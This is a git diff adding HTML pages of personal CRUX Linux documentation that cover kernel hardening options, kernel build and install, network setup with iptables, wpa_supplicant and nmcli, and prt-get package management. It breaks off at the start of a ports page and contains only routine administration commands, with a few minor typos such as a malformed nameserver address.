+            <dd>Overlay filesystem support</dd>
+
+            <dt>CONFIG_PROC_KCORE=n</dt>
+            <dd>/proc/kcore support</dd>
+            <dd>Dangerous; exposes kernel text image layout.</dd>
+
+            <dd>HugeTLB file system support</dd>
+
+            <dt>CONFIG_FUSE_FS=y</dt>
+            <dd>FUSE (Filesystem in Userspace) support</dd>
+
+        </dl>
+
+        <h3 id="hack">2.1.2.12 Kernel hacking</h3>
+
+        <dl>
+            <dt>CONFIG_DEBUG=y</dt>
+            <dt>CONFIG_DEBUG_RODATA=y</dt>
+
+            <dt>CONFIG_DEBUG_KERNEL=y</dt>
+            <dd>Kernel debugging</dd>
+            <dd>Make sure kernel page tables have safe permissions.</dd>
+
+            <dt>CONFIG_STRICT_KERNEL_RWX=y</dt>
+            <dd>since v4.11</dd>
+            <dd>Make sure kernel page tables have safe permissions.</dd>
+
+            <dt>CONFIG_PANIC_ON_OOPS=y</dt>
+            <dd>Panic on Oops</dd>
+            <dd>This feature is useful to ensure that the kernel does not do
+            anything erroneous after an oops which could result in data
+            corruption or other issues.</dd>
+
+            <dt>CONFIG_PANIC_TIMEOUT=-1</dt>
+            <dd>Reboot devices immediately if kernel experiences an Oops.</dd>
+
+            <dt>CONFIG_SCHED_STACK_END_CHECK=y</dt>
+            <dd>Detect stack corruption on calls to schedule()</dd>
+            <dd>Perform additional validation of various commonly targeted structures.</dd>
+
+            <dt>CONFIG_DEBUG_LIST=y</dt>
+            <dd>Debug linked list manipulation</dd>
+            <dd>Perform additional validation of various commonly targeted structures.</dd>
+
+            <dt>CONFIG_DEBUG_SG=y</dt>
+            <dd>Debug SG table operations</dd>
+            <dd>Perform additional validation of various commonly targeted structures.</dd>
+
+            <dt>CONFIG_DEBUG_NOTIFIERS=y</dt>
+            <dd>Debug notifier call chains</dd>
+            <dd>Perform additional validation of various commonly
+            targeted structures.</dd>
+
+            <dt>CONFIG_DEBUG_CREDENTIALS=y</dt>
+            <dd>Debug credential management</dd>
+            <dd>Perform additional validation of various commonly
+            targeted structures.</dd>
+
+            <dt>CONFIG_STRICT_DEVMEM=y</dt>
+            <dd>Filter access to /dev/mem</dd>
+            <dd>Do not allow direct physical memory access (but if you must have it, at least enable STRICT mode...)</dd>
+
+            <dt>CONFIG_IO_STRICT_DEVMEM=y</dt>
+            <dd>Filter I/O access to /dev/mem</dd>
+            <dd>Do not allow direct physical memory access (but if you must have it, at least enable STRICT mode...)</dd>
+
+            <dt>CONFIG_DEBUG_WX=y</dt>
+            <dd>Warn on W+X mappings at boot</dd>
+            <dd>Report any dangerous memory permissions
+            (not available on all archs).</dd>
+
+
+        </dl>
+
+        <h4>Compile-time checks and compiler options</h4>
+        <dl>
+            <dt>CONFIG_DEBUG_FS=y</dt>
+            <dd>Debug Filesystem</dd>
+
+        </dl>
+
+        <h4>Memory Debugging</h4>
+        <dl>
+            <dt>CONFIG_PAGE_POISONING=y</dt>
+            <dd>Poison pages after freeing</dd>
+            <dd>Wipe higher-level memory allocations when they are freed
+            (needs "page_poison=1" command line below).</dd>
+
+            <dt>CONFIG_PAGE_POISONING_NO_SANITY=y</dt>
+            <dd>Only poison, don't sanity check</dd>
+            <dd>(If you can afford even more performance penalty,
+            leave CONFIG_PAGE_POISONING_NO_SANITY=n)</dd>
+
+            <dt>CONFIG_PAGE_POISONING_ZERO=y</dt>
+            <dd>Use zero for poisoning instead of random data</dd>
+
+        </dl>
+
+        <h3 id="sec">2.1.2.13 Security options</h3>
+
+        <dl>
+            <dd>Enable access key retention support</dd>
+            <dd>Enable register of persistent per-UID keyrings</dd>
+            <dd>ENCRYPTED KEYS</dd>
+            <dd>Diffie-Hellman operations on retained keys</dd>
+
+            <dt>CONFIG_SECURITY=y</dt>
+            <dd>Enable different security models</dd>
+            <dd>Provide userspace with ptrace ancestry protections.</dd>
+
+            <dt>CONFIG_HARDENED_USERCOPY=y</dt>
+            <dd>Harden memory copies between kernel and userspace</dd>
+            <dd>Perform usercopy bounds checking.</dd>
+
+            <dt>SECURITY_SELINUX=n</dt>
+            <dd>NSA SELinux Support</dd>
+            <dt>CONFIG_SECURITY_SELINUX_DISABLE=n</dt>
+            <dd>NSA SELinux runtime disable</dd>
+            <dd>If SELinux can be disabled at runtime, the LSM structures cannot be read-only; keep off.</dd>
+
+            <dt>CONFIG_SECURITY_APPARMOR=y</dt>
+            <dd>AppArmor support</dd>
+            <dd>This enables the AppArmor security module. Rquired userspace
+            tools (if they are not included in your distribution) and further
+            information may be found at <a href="apparmor.html">AppArmor</a></dd>
+            <dt>CONFIG_SECURITY_APPARMOR_BOOTPARAM_VALUE=1</dt>
+            <dd>AppArmor boot parameter default value</dd>
+
+            <dt>CONFIG_SECURITY_YAMA=y</dt>
+            <dd>Yama support</dd>
+            <dd>Provide userspace with ptrace ancestry protections.</dd>
+        </dl>
+
+        <h3 id="crypt">2.1.2.14 Cryptographic API</h3>
+
+        <dl>
+            <dt>CONFIG_CRYPTO_LRW</dt>
+            <dd>Liskov Rivest Wagner, a tweakable, non malleable, non movable
+            narrow block cipher mode for dm-crypt.</dd>
+
+            <dt>CONFIG_CRYPTO_RMD160=y</dt>
+            <dt>CONFIG_CRYPTO_RMD256=y</dt>
+            <dt>CONFIG_CRYPTO_RMD320=y</dt>
+            <dd>RIPEMD 160/256/320 digest algorithm</dd>
+
+	    <dt>CONFIG_CRYPTO_SHA256=y</dt>
+	    <dd>SHA224 and SHA256 digest algorithm<dd>
+
+            <dt>CONFIG_CRYPTO_SHA512=y</dt>
+            <dd>SHA384 and SHA512 digest algorithms</dd>
+
+            <dt>CONFIG_CRYPTO_WP512=y</dt>
+            <dd>Whirlpool digest algorithms</dd>
+
+	    <dt>CONFIG_CRYPTO_DES3_EDE_X86_64=y</dt>
+	    <dd>DES and Triple DES EDE cipher algorithms<dd>
+
+            <dt>CONFIG_CRYPTO_SERPENT=y</dt>
+            <dd>Serpent cipher algorithm</dd>
+
+            <dt>CONFIG_CRYPTO_TWOFISH=y<dt>
+            <dd>Twofish cipher algorithm</dd>
+        </dl>
+
+	    <pre>
+	    *   MD4 digest algorithm
+	    *   MD5 digest algorithm
+	    *   SHA1 digest algorithm
+	    *   Blowfish cipher algorithm
+	    *   AES cipher algorithms
+	    *   CAST5 (CAST-128) cipher algorithm
+	    *   CAST6 (CAST-256) cipher algorithm 
+	    *   Deflate compression algorithm
+	    </pre>
+
+        <h3 id="virt">2.1.2.15 Virtualization</h3>
+
+        <dl>
+            <dt>CONFIG_KVM=y</dt>
+            <dd>Kernel-based Virtual Machine (KVM) support</dd>
+
+            <dt>CONFIG_KVM_INTEL=y</dt>
+            <dd>KVM for Intel processors support</dd>
+            <dd>Provides support for KVM on Intel processors equipped with the VT extensions.</dd>
+
+            <dt>CONFIG_KVM_AMD=y</dt>
+            <dd>KVM for AMD processors support</dd>
+            <dd>Provides support for KVM on AMD processors equipped with the
+            AMD-V (SVM) extensions.</dd>
+
+            <dt>CONFIG_KVM_DEVICE_ASSIGNMENT=n</dt>
+            <dd>KVM legacy PCI device assignment support (DEPRECATED)</dd>
+
+            <dt>CONFIG_VHOST_NET=y</dt>
+            <dd>Host kernel accelerator for virtio net<dd>
+
+            <dt>CONFIG_VHOST_VSOCK=y</dt>
+            <dd>vhost virtio-vsock driver</dd>
+
+            <dt>CONFIG_VHOST_CROSS_ENDIAN_LEGACY=y</dt>
+            <dd>Cross-endian support for vhost</dd>
+        </dl>
+
+        <h3 id="lib">2.1.2.16 Library routines</h3>
+
+        <h2 id="build">2.1.3. Build</h2>
+
+        <p>Make targets;</p>
+
+        <pre>
+        Other generic targets:
+          all             - Build all targets marked with [*]
+        * vmlinux         - Build the bare kernel
+        * modules         - Build all modules
+                            (default: ./usr)
+
+        Documentation targets:
+         Linux kernel internal documentation in different formats (Sphinx):
+          htmldocs        - HTML
+          latexdocs       - LaTeX
+          pdfdocs         - PDF
+          epubdocs        - EPUB
+          xmldocs         - XML
+          cleandocs       - clean all generated files
+
+          make SPHINXDIRS="s1 s2" [target] Generate only docs of folder s1, s2
+          valid values for SPHINXDIRS are: development-process media gpu 80211
+
+          make SPHINX_CONF={conf-file} [target] use *additional* sphinx-build
+          configuration. This is e.g. useful to build with nit-picking config.
+
+         Linux kernel internal documentation in different formats (DocBook):
+          htmldocs        - HTML
+          pdfdocs         - PDF
+          psdocs          - Postscript
+          xmldocs         - XML DocBook
+          mandocs         - man pages
+          installmandocs  - install man pages generated by mandocs
+          cleandocs       - clean all generated DocBook files
+
+        Architecture specific targets (x86):
+        * bzImage      - Compressed kernel image (arch/x86/boot/bzImage)
+          install      - Install kernel using
+                          (your) ~/bin/installkernel or
+                          (distribution) /sbin/installkernel or
+                          install to $(INSTALL_PATH) and run lilo
+          fdimage      - Create 1.4MB boot floppy image (arch/x86/boot/fdimage)
+          fdimage144   - Create 1.4MB boot floppy image (arch/x86/boot/fdimage)
+          fdimage288   - Create 2.8MB boot floppy image (arch/x86/boot/fdimage)
+          isoimage     - Create a boot CD-ROM image (arch/x86/boot/image.iso)
+                          bzdisk/fdimage*/isoimage also accept:
+                          FDARGS="..."  arguments for the booted kernel
+                          FDINITRD=file initrd for the booted kernel
+
+          i386_defconfig           - Build for i386
+          x86_64_defconfig         - Build for x86_64
+
+          make V=0|1 [targets] 0 => quiet build (default), 1 => verbose build
+          make V=2   [targets] 2 => give reason for rebuild of target
+          make O=dir [targets] Locate all output files in "dir", including .config
+          make C=1   [targets] Check all c source with $CHECK (sparse by default)
+          make C=2   [targets] Force check of all c source with $CHECK
+          make RECORDMCOUNT_WARN=1 [targets] Warn about ignored mcount sections
+          make W=n   [targets] Enable extra gcc checks, n=1,2,3 where
+                        1: warnings which may be relevant and do not occur too often
+                        2: warnings which occur quite often but may still be relevant
+                        3: more obscure warnings, can most likely be ignored
+                        Multiple levels can be combined with W=12 or W=123
+        </pre>
+
+
+        <pre>
+        $ make -j $(nproc) bzImage modules
+        </pre>
+
+        <h2 id="install">2.1.5. Install</h2>
+        <pre>
+          modules_install - Install all modules to INSTALL_MOD_PATH (default: /)
+          firmware_install- Install all firmware to INSTALL_FW_PATH
+                            (default: $(INSTALL_MOD_PATH)/lib/firmware)
+          modules_prepare - Set up for building external modules
+          headers_install - Install sanitised kernel headers to INSTALL_HDR_PATH
+        </pre>
+
+        <pre>
+        $ sudo make modules_install
+        $ sudo cp arch/x86/boot/bzImage /boot/vmlinuz-4.9.86-gnu
+        $ sudo cp System.map /boot/System.map-4.9.86-gnu
+        </pre>
+
+        <p>Update grub;</p>
+
+        <pre>
+        # grub-mkconfig -o /boot/grub/grub.cfg
+        </pre>
+
+        <h2 id="remove">2.1.6. Remove</h2>
+
+        <pre>
+        $ sudo rm -r /lib/modules/4.9.86-gnu
+        $ sudo rm /boot/vmlinuz-4.9.86-gnu
+        $ sudo rm /boot/System.map-4.9.86-gnu
+        </pre>
+
+        <a href="index.html">GNU/Linux Index</a>
+        <p>This is part of the LeetIO System Documentation.
+        Copyright (C) 2021
+        LeetIO Team.
+        See the file <a href="../fdl-1.3-standalone.html">Gnu Free Documentation License</a>
+        for copying conditions.</p>
+
+    </body>
+</html>
diff --git a/linux/network.html b/linux/network.html
new file mode 100644
index 0000000..a0e542e
--- /dev/null
+++ b/linux/network.html
@@ -0,0 +1,476 @@
+<!DOCTYPE html>
+<html dir="ltr" lang="en">
+    <head>
+        <meta charset='utf-8'>
+        <title>2.7. Network</title>
+    </head>
+    <body>
+        <a href="index.html">GNU/Linux Index</a>
+
+        <h1>2.7. Network</h1>
+
+        <p>Operation of the network can be handle with init scripts or with
+        <a href="#nm">network manager</a>;</p>
+
+        <dl>
+            <dt><a href="conf/rc.d/iptables">/etc/rc.d/iptables</a></dt>
+            <dd>Configure <a href="#iptables">iptables</a>, "start" option
+            loads set of rules from file /etc/iptables/(name).v4, "open" option
+            allows everything to outside and blocks everything from outside,
+            "stop" option will block and log everything.</dd>
+            <dt><a href="conf/rc.d/net">/etc/rc.d/net</a></dt>
+            <dd>Configure Ethernet interface with static or dynamic (dhcp)
+            IP, set default route and add default gateway.</dd>
+            <dt><a href="conf/rc.d/wlan">/etc/rc.d/wlan</a></dt>
+            <dd>Configure Wireless interface, launch wpa_supplicant to handle
+            wireless authenticationand dynamic (dhcp)
+            connection to router and add as default gateway.</dd>
+            <dt><a href="conf/rc.d/wlan">/etc/rc.d/networkmanager</a></dt>
+            <dd>Use network manager to handle connections.</dd>
+        </dl>
+
+        <p>Choose wireless (wlan), cable network (net) or network manager in
+        <a href="conf/rc.conf">/etc/rc.conf</a> to handle configuration of the 
+        network at startup, example using network manager;</p>
+
+        <pre>
+        #
+        # /etc/rc.conf: system configuration
+        #
+
+        FONT=default
+        KEYMAP=dvorak
+        TIMEZONE="Europe/Lisbon"
+        HOSTNAME=machine
+        SYSLOG=sysklogd
+        SERVICES=(lo iptables networkmanager crond)
+
+        # End of file
+        </pre>
+
+        <p>If is first boot after install configure iptables and one of above
+        described scripts then proceed to
+        <a href="package.html#sysup">update system.</a></p>
+
+        <h2 id="resolv">2.7.1. Resolver</h2>
+
+        <p>This example will use
+        <a href="http://www.chaoscomputerclub.de/en/censorship/dns-howto">Chaos Computer Club</a>
+        server, edit /etc/resolv.conf and make it immutable;</p>
+
+        <pre>
+        # /etc/resolv.conf.head can replace this line
+        nameserver 2.2.73.91.35
+        # /etc/resolv.conf.tail can replace this line
+        </pre>
+
+        <pre>
+        # chattr +i /etc/resolv.conf
+        </pre>
+
+        <h2 id="static">2.7.2. Static IP</h2>
+
+        <p>Current example of <a href="conf/rc.d/net">/etc/rc.d/net</a>;</p>
+
+        <pre>
+        Address:   192.168.0.1           11000000.10101000.00000000 .00000001
+        Netmask:   255.255.255.0 = 24    11111111.11111111.11111111 .00000000
+        Wildcard:  0.0.0.255             00000000.00000000.00000000 .11111111
+        =>
+        Network:   192.168.0.0/24        11000000.10101000.00000000 .00000000 (Class C)
+        Broadcast: 192.168.0.255         11000000.10101000.00000000 .11111111
+        HostMin:   192.168.0.1           11000000.10101000.00000000 .00000001
+        HostMax:   192.168.0.254         11000000.10101000.00000000 .11111110
+        Hosts/Net: 254                   (Private Internet)
+        </pre>
+
+        <p>Other IP class that can used for private network;</p>
+
+        <pre>
+        Address:   10.0.0.1              00001010.00000000.00000000 .00000001
+        Netmask:   255.255.255.0 = 24    11111111.11111111.11111111 .00000000
+        Wildcard:  0.0.0.255             00000000.00000000.00000000 .11111111
+        =>
+        Network:   10.0.0.0/24           00001010.00000000.00000000 .00000000 (Class A)
+        Broadcast: 10.0.0.255            00001010.00000000.00000000 .11111111
+        HostMin:   10.0.0.1              00001010.00000000.00000000 .00000001
+        HostMax:   10.0.0.254            00001010.00000000.00000000 .11111110
+        Hosts/Net: 254                   (Private Internet)
+        </pre>
+
+        <p>Manual configuring like net script;</p>
+
+        <pre>
+        # DEV=enp8s0
+        # ADDR=192.168.1.9
+        # MASK=24
+        # GW=192.168.1.254
+        </pre>
+
+        <pre>
+        # ip addr flush dev ${DEV}
+        # ip route flush dev ${DEV}
+        # ip addr add ${ADDR}/${MASK} dev ${DEV} broadcast +
+        # ip link set ${DEV} up
+        # ip route add default via ${GW}
+        </pre>
+
+        <h2 id="iptables">2.7.3. Iptables</h2>
+
+        <p>For more information about firewall systems read arch wiki
+        <a href="https://wiki.archlinux.org/index.php/Iptables">iptables</a>
+        and <a href="https://wiki.archlinux.org/index.php/nftables">nftables</a>.</p>
+
+        <p>Diagram of a package route throw iptables;</p>
+
+        <pre>
+
+                                 XXXXXXXXXXXXXXXXX
+                                 XXXX Network XXXX
+                                 XXXXXXXXXXXXXXXXX
+                                         +
+                                         |
+                                         v
+   +-------------+              +------------------+
+   |table: filter| &gt;---+        | table: nat       |
+   |chain: INPUT |     |        | chain: PREROUTING|
+   +-----+-------+     |        +--------+---------+
+         |             |                 |
+         v             |                 v
+   [local process]     |           ****************          +--------------+
+         |             +---------+ Routing decision +------&lt; |table: filter |
+         v                         ****************          |chain: FORWARD|
+  ****************                                           +------+-------+
+  Routing decision                                                  |
+  ****************                                                  |
+         |                                                          |
+         v                        ****************                  |
+  +-------------+       +------&lt;  Routing decision  &gt;---------------+
+  |table: nat   |       |         ****************
+  |chain: OUTPUT|       |               +
+  +-----+-------+       |               |
+        |               |               v
+        v               |      +-------------------+
+  +--------------+      |      | table: nat        |
+  |table: filter | +----+      | chain: POSTROUTING|
+  |chain: OUTPUT |             +--------+----------+
+  +--------------+                      |
+                                        v
+                                XXXXXXXXXXXXXXXXX
+                                XXXX Network XXXX
+                                XXXXXXXXXXXXXXXXX
+
+        </pre>
+
+        <p>Command line usage;</p>
+
+        <pre>
+        iptables [-t table] {-A|-C|-D} chain rule-specification
+        iptables [-t table] {-A|-C|-D} chain  rule-specification
+        iptables  [-t table] -I chain [rulenum] rule-specification
+        iptables [-t table] -R chain rulenum  rule-specification
+        iptables [-t table] -D chain rulenum
+        iptables [-t table] -S [chain [rulenum]]
+        iptables  [-t  table]  {-F|-L|-Z} [chain [rulenum]] [options...]
+        iptables [-t table] -N chain
+        iptables [-t table] -X [chain]
+        iptables [-t table] -P chain target
+        iptables [-t table]  -E  old-chain-name  new-chain-name
+        rule-specification = [matches...] [target]
+        match = -m matchname [per-match-options]
+        </pre>
+
+        <p>Targets, can be a user defined chain;</p>
+
+        <pre>
+        ACCEPT - accepts the packet
+        DROP   - drop the packet on the floor
+        QUEUE  - packet will be stent to queue
+        RETURN - stop traversing this chain and
+                 resume ate the next rule in the
+                 previeus (calling) chain.
+
+        if packet reach the end of the chain or
+        a target RETURN, default policy for that
+        chain is applayed.
+        </pre>
+
+        <p>Target Extensions</p>
+
+        <pre>
+        AUDIT
+        CHECKSUM
+        CLASSIFY
+        DNAT
+        DSCP
+        LOG
+            Torn on kernel logging, will print some
+            some information on all matching packets.
+            Log data can be read with dmesg or syslogd.
+            This is a non-terminating target and a rule
+            should be created with matching criteria.
+
+            --log-level level
+                  Level of logging (numeric or see sys-
+                  log.conf(5)
+
+            --log-prefix prefix
+                  Prefix log messages with specified prefix
+                  up to 29 chars log
+
+            --log-uid
+                  Log the userid of the process with gener-
+                  ated the packet
+        NFLOG
+            This target pass the packet to loaded logging
+            backend to log the packet. One or more userspace
+            processes may subscribe to the group to receive
+            the packets.
+
+        ULOG
+            This target provides userspace logging of maching
+            packets. One or more userspace processes may then
+            then subscribe to various multicast groups and
+            then receive the packets.
+        </pre>
+
+        <p>Commands</p>
+        <pre>
+         -A, --append chain rule-specification
+         -C, --check chain rule-specification
+         -D, --delete chain rule-specification
+         -D, --delete chain rulenum
+         -I, --insert chain [rulenum] rule-specification
+         -R, --replace chain rulenum rule-specification
+         -L, --list [chain]
+         -P, --policy chain target
+        </pre>
+
+        <p>Parameters</p>
+        <pre>
+         -p, --protocol protocol
+               tcp, udp, udplite, icmp, esp, ah, sctp, all
+         -s, --source address[/mask][,...]
+         -d, --destination address[/mask][,...]
+         -j, --jump target
+         -g, --goto chain
+         -i, --in-interface name
+         -o, --out-interface name
+         -f, --fragment
+         -m, --match options module-name
+               iptables can use extended packet matching
+               modules.
+         -c, --set-counters packets bytes
+        </pre>
+
+        <p>See current rules and packets counts;</p>
+
+        <pre>
+        # iptables -L -n -v | less
+        </pre>
+
+        <h3 id="ipt_scripts">2.7.3.1. Iptable scripts</h3>
+
+        <p>Scripts help to setup iptables rules so they can be saved using iptables-save
+        and later restored using iptables-restore utilities. Init script
+        <a href="conf/rc.d/iptables">/etc/rc.d/iptables</a>
+        loads set of rules from /etc/iptables folder at boot time.
+        Start option "open" option allows everything to outside
+        and blocks new connections from outside, "stop" will block and log
+        everything.</p>
+
+        <p>Setup init script and rules;</p>
+
+        <pre>
+        # mkdir /etc/iptables
+        # cp core/conf/iptables/*.sh /etc/iptables/
+        # cp core/conf/rc.d/iptables /etc/rc.d/
+        # chmod +x /etc/rc.d/iptables
+        </pre>
+
+        <p>Change /etc/rc.conf and add iptables;</p>
+
+        <pre>
+        SERVICES=(iptables lo net crond)
+        </pre>
+
+        <p>Change <a href="conf/rc.d/iptables">/etc/rc.d/iptables</a> and define type; server, bridge or open.</p>
+
+        <p>Adjust <a href="conf/ipt-conf.sh">/etc/iptables/ipt-conf.sh</a>
+        with your network configuration, and adjust
+        <a href="conf/ipt-server.sh">/etc/iptables/ipt-server.sh</a>, <a href="conf/ipt-bridge.sh">/etc/iptables/ipt-bridge.sh</a>, <a href="conf/ipt-open.sh">/etc/iptables/ipt-open.sh</a> according with host necessities.</p>
+
+        <p>When is everything configured run script to load the rules and save them on /etc/iptables. Example for bridge setup;</p>
+
+        <pre>
+        # cd /etc/iptables
+        # bash ipt-bridge.sh
+        </pre>
+
+        <p>From now on use /etc/rc.d/iptables to start and stop.<p>
+
+        <h2 id="bridge">2.7.4 Bridges</h2>
+
+        <p>For more information about bridges read
+        <a href="http://ebtables.netfilter.org/br_fw_ia/br_fw_ia.html#section7">bridges with iptables</a>.
+        Script <a href="conf/etc/rc.d/blan">/etc/rc.d/blan</a> creates br0 bridge interface
+        with 10.0.0.1 ip. Number of tap interfaces created and attached depends on number
+        of cpu cores available. Ethernet interface is added to the bridge. Edit /etc/rc.conf
+        to setup interfaces at startup;</p>
+
+        <pre>
+        #
+        # /etc/rc.conf: system configuration
+        #
+
+        FONT=default
+        KEYMAP=dvorak
+        TIMEZONE="Europe/Lisbon"
+        HOSTNAME=machine
+        SYSLOG=sysklogd
+        SERVICES=(lo iptables wlan blan crond)
+
+        # End of file
+        </pre>
+
+        <p>Change iptables init script
+        <a href="../linux/conf/rc.d/iptables">/etc/rc.d/iptables</a>
+        and set TYPE to bridge,
+        <a href="../linux/conf/iptables/bridge.v4">/etc/iptables/bridge.v4</a>.
+        Now change
+        <a href="../linux/conf/iptables/ipt-conf.sh">ipt-conf.sh</a>
+        and <a href="../linux/conf/iptables/ipt-bridge.sh">ipt-bridge.sh</a>
+        with your network configuration and run;
+        </p>
+
+        <pre>
+        # bash ipt-bridge.sh
+        </pre>
+
+        <h2 id="wpa">2.7.5. Wpa and dhcpd</h2>
+
+        <p>There is more information on
+        <a href="http://crux.nu/Wiki/WifiStartScripts">Wiki Wifi Start Scripts</a> and
+        see <a href="conf/rc.d/wlan">/etc/rc.d/wlan</a>. Manual or first time configuration;</p>
+
+        <pre>
+        # ip link
+        </pre>
+
+        <pre>
+        # iwlist wlp2s0 scan
+        </pre>
+
+        <pre>
+        # iwconfig wlp2s0 essid NAME key s:ABCDE12345
+        </pre>
+
+        <h3>2.7.4.1. Wpa Supplicant</h3>
+
+        <p>Configure wpa supplicant edit;</p>
+
+        <pre>
+        # vim /etc/wpa_supplicant.conf
+        </pre>
+
+        <pre>
+        ctrl_interface=/var/run/wpa_supplicant
+        update_config=1
+        fast_reauth=1
+        ap_scan=1
+        </pre>
+
+        <pre>
+        # wpa_passphrase &lt;ssid&gt; &lt;password&gt; &gt;&gt; /etc/wpa_supplicant.conf
+        </pre>
+
+        <p>Now start wpa_supplicant with:</p>
+
+        <pre>
+        # wpa_supplicant -B -i wlp2s0 -c /etc/wpa_supplicant.conf
+        Successfully initialized wpa_supplicant
+        </pre>
+
+        <p>Use <a href="conf/rc.d/wlan">/etc/rc.d/wlan</a>
+        init script to auto load wpa configuration and dhcp
+        client.</p>
+
+        <h3>2.7.4.2. Wpa Cli</h3>
+
+        <pre>
+        # wpa_cli
+        &gt; status
+        </pre>
+
+        <pre>
+        &gt; add_network
+        3
+        </pre>
+
+        <pre>
+        &gt; set_network 3 ssid "Crux-Network"
+        OK
+        </pre>
+
+        <pre>
+        &gt; set_network 3 psk "uber-secret-pass"
+        OK
+        </pre>
+
+        <pre>
+        &gt; enable_network 3
+        OK
+        </pre>
+
+        <pre>
+        &gt; list_networks
+        </pre>
+
+        <pre>
+        &gt; select_network 3
+        </pre>
+
+        <pre>
+        &gt; save_config
+        </pre>
+
+        <h2 id="nm">2.7.6. Network Manager</h2>
+
+        <p>Wifi status;</p>
+
+        <pre>
+        $ nmcli radio wifi
+        $ nmcli radio wifi on
+        </pre>
+
+        <p>List wifi networks;</p>
+
+        <pre>
+        $ nmcli device wifi rescan
+        $ nmcli device wifi list
+        </pre>
+
+        <p>Connect to a wifi network;</p>
+
+        <pre>
+        $ nmcli device wifi connect "network name" password "network password"
+        </pre>
+
+        <p>Edit and save network configuration;</p>
+
+        <pre>
+        $ nmcli connection edit "network name"
+        nmcli> save persistent
+        </pre>
+
+
+        <a href="index.html">GNU/Linux Index</a>
+        <p>
+        This is part of the LeetIO System Documentation.
+        Copyright (C) 2021
+        LeetIO Team.
+        See the file <a href="../fdl-1.3-standalone.html">Gnu Free Documentation License</a>
+        for copying conditions.</p>
+
+    </body>
+</html>
diff --git a/linux/package.html b/linux/package.html
new file mode 100644
index 0000000..78069eb
--- /dev/null
+++ b/linux/package.html
@@ -0,0 +1,190 @@
+<!DOCTYPE html>
+<html dir="ltr" lang="en">
+    <head>
+        <meta charset='utf-8'>
+        <title>2.2. Package Management</title>
+    </head>
+    <body>
+
+        <a href="index.html">GNU/Linux Index</a>
+
+        <h1>2.2. Package Management</h1>
+
+        <p>For more information read crux handbook Package management
+        front-end:
+        <a href="https://crux.nu/Handbook3-3#ntoc20">prt-get</a>
+        and Introduction to
+        <a href="https://crux.nu/Main/Handbook3-3#ntoc14">pkgutils</a>.</p>
+        </p>
+
+
+        <dl>
+            <dt>pkgmk(8)</dt>
+
+            <dd>Makes a software package. A package is an archive of
+            files (.pkg.tar.gz, .pkg.tar.bz2 or  .pkg.tar.xz)
+            that can be installed using pkgadd(8).</dd>
+
+            <dt>pkgadd(8)</dt>
+
+            <dd>install a software package. A package is an
+            archive of files (.pkg.tar.gz).</dd>
+
+            <dt>pkginfo(8)</dt>
+
+            <dd>Displays information about software packages that
+            are installed on the system or  that  reside  in  a
+            particular directory.</dd>
+
+            <dt>pkgrm(8)</dt>
+
+            <dd>Removes/uninstalls a previously installed software
+            packages.</dd>
+
+            <dt>prt-get(8)</dt>
+
+            <dd>prt-get is a package management tool which
+            provides additional functionality to crux' package
+            management system. It works with the local ports tree
+            and is therefore fully compatible with ports(8) and
+            pkgmk(8)/pkgadd(8)</dd>
+        </dl>
+
+        <p>Test configuration by runing prt-get as admin user installing
+        ports that are related;</p>
+
+        <pre>
+        $ prt-get depinst prt-utils prt-get-bashcompletion
+        </pre>
+
+        <h2 id="sysup">2.2.1. Update System</h2>
+
+        <p>Before build software get latest version of port collections;</p>
+
+        <pre>
+        $ sudo ports -u
+        </pre>
+
+        <p>When coming from install or there is to much updates, I prefer to
+        update gcc, glibc, libtool and binutils before doing a sysup;</p>
+
+        <pre>
+        $ prt-get update gcc
+        $ prt-get update glibc
+        $ prt-get update libtool
+        $ prt-get update binutils
+        </pre>
+
+        <p>Build and install updated versions of ports;</p>
+
+        <pre>
+        $ prt-get sysup
+        </pre>
+
+        <p>Rebuild any revision dependency;</p>
+
+        <pre>
+        $ prt-get update -fr $(revdep)
+        </pre>
+
+        <h2 id="depinst">2.2.2. Install port and dependencies</h2>
+
+        <p>Installing using prt-get tool;</p>
+
+        <pre>
+        $ prt-get depinst git
+        </pre>
+
+        <p>Installing using pkgmk and pkgadd, first build the package;</p>
+
+        <pre>
+        $ cd /usr/ports/opt/git
+        $ sudo -H -u pkgmk fakeroot pkgmk -d
+        </pre>
+
+        <p>Install the package;</p>
+
+        <pre>
+        $ sudo pkgadd /usr/ports/packages/git#2.9.3-1.pkg.tar.gz
+        </pre>
+
+        <p>If you user pkgmk and pkgadd allways check if README, pre and post
+        instal files exist.</p>
+
+        <h3 id="ports">2.2.3. Ports collections</h3>
+
+        <p>Clone this documentation;</p>
+
+        <pre>
+        $ git clone git://tribu.semdestino.org/ports.git
+        </pre>
+
+        <p>Install collections later documented;</p>
+
+        <pre>
+        $ sudo cp doc/core/conf/ports/* /etc/ports/
+        </pre>
+
+        <p>Edit /etc/prt-get.conf to activate new collections;</p>
+
+        <pre>
+        # the following line enables the user maintained contrib collection
+        prtdir /usr/ports/contrib
+
+        # ports described on this documentation
+        prtdir /usr/ports/ports
+
+        # 6c37 team provides a collection with freetype-iu, fontconfig-iu
+        # and cairo-iu ports.
+        # prtdir /usr/ports/6c37-dropin
+        # prtdir /usr/ports/6c37
+        </pre>
+
+        <p>Get new ports;</p>
+
+        <pre>
+        $ sudo ports -u ports
+        </pre>
+
+        <h2 id="info">2.2.4. Show port information</h2>
+
+        <pre>
+        $ prt-get info port_name
+        </pre>
+
+        <p>List files port install into system;</p>
+
+        <pre>
+        $ pkginfo -l package_name
+        </pre>
+
+        <p>Discover to wich port a file belongs;</p>
+
+        <pre>
+        $ pkginfo -o filename
+        </pre>
+
+        <h2 id="depends">2.2.5. Show port dependencies</h2>
+
+        <pre>
+        $ prt-get depends port_name
+        </pre>
+
+        <h2 id="printf">2.2.6. Print information</h2>
+
+        <p>Example how to get ports installed from contrib. Maybe there is
+        a "cleaner" way to this, for now is ok;</p>
+
+        <pre>
+        prt-get printf "%p %i %n %v\n" | grep "/usr/ports/contrib yes"
+        </pre>
+
+        <a href="index.html">GNU/Linux Index</a>
+        <p>This is part of the LeetIO System Documentation.
+        Copyright (C) 2021
+        LeetIO Team.
+        See the file <a href="../fdl-1.3-standalone.html">Gnu Free Documentation License</a>
+        for copying conditions.</p>
+
+    </body>
+</html>
diff --git a/linux/ports.html b/linux/ports.html
new file mode 100644
index 0000000..28047c5
--- /dev/null
+++ b/linux/ports.html
@@ -0,0 +1,265 @@
+<!DOCTYPE html>
+<html dir="ltr" lang="en">
+    <head>
+        <meta charset='utf-8'>
+        <title>1.4. Ports</title>
+    </head>
+    <body>
+
+        <a href="index.html">GNU/Linux Index</a>
+
+        <h1>1.4. Ports</h1>
+
+        <p>This instructions are done
